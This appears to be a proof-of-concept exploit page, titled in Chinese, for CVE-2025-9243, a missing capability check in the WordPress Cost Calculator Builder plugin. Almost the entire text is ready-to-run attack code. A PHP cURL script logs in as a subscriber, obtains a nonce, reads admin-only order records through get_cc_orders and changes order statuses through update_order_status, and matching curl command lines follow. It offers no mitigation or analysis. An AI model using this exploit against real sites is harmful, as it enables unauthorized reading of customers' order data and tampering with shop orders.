CVE-2025-9243 WordPress Cost Calculator Builder插件权限提升漏洞

<?php /** * CVE-2025-9243 PoC - Cost Calculator Builder Broken Access Control * Affected: Cost Calculator Builder <= 3.5.32 * Vulnerability: Missing capability check on get_cc_orders and update_order_status */ // Exploit via WordPress AJAX endpoint // Requires: Authenticated Subscriber-level account $target_url = 'https://target-wordpress-site.com'; $username = 'subscriber_user'; $password = 'user_password'; // Step 1: Login to obtain authentication cookies and nonce $login_url = $target_url . '/wp-login.php'; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $login_url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([ 'log' => $username, 'pwd' => $password, 'wp-submit' => 'Log In', 'redirect_to'=> $target_url . '/wp-admin/', 'testcookie' => '1' ])); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt'); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $response = curl_exec($ch); // Step 2: Fetch a valid nonce from admin page (or use AJAX nonce) $admin_page = $target_url . '/wp-admin/admin-ajax.php?action=rest-nonce'; curl_setopt($ch, CURLOPT_URL, $admin_page); curl_setopt($ch, CURLOPT_HTTPGET, true); $nonce = trim(curl_exec($ch)); // Step 3: Exploit - Call get_cc_orders (unauthorized order access) $ajax_url = $target_url . '/wp-admin/admin-ajax.php'; curl_setopt($ch, CURLOPT_URL, $ajax_url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([ 'action' => 'get_cc_orders', 'nonce' => $nonce ])); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); echo "[+] Fetching orders (should be admin-only):\n"; echo curl_exec($ch) . "\n"; // Step 4: Exploit - Call update_order_status (unauthorized status modification) curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([ 'action' => 'update_order_status', 'order_id'=> '1', 'status' => 'completed', // Change to any status: pending, processing, completed, cancelled 'nonce' => $nonce ])); echo "[+] Modifying order status (should be admin-only):\n"; echo curl_exec($ch) . "\n"; curl_close($ch); ?> # Alternative: curl command-line exploitation # Step 1: Login and store cookies curl -c cookies.txt -b cookies.txt \ -d "log=subscriber_user&pwd=password&wp-submit=Log+In&redirect_to=/wp-admin/&testcookie=1" \ https://target-wordpress-site.com/wp-login.php # Step 2: Get nonce NONCE=$(curl -b cookies.txt -s https://target-wordpress-site.com/wp-admin/admin-ajax.php?action=rest-nonce) # Step 3: Exploit get_cc_orders curl -b cookies.txt -d "action=get_cc_orders&nonce=$NONCE" \ https://target-wordpress-site.com/wp-admin/admin-ajax.php # Step 4: Exploit update_order_status curl -b cookies.txt -d "action=update_order_status&order_id=1&status=completed&nonce=$NONCE" \ https://target-wordpress-site.com/wp-admin/admin-ajax.php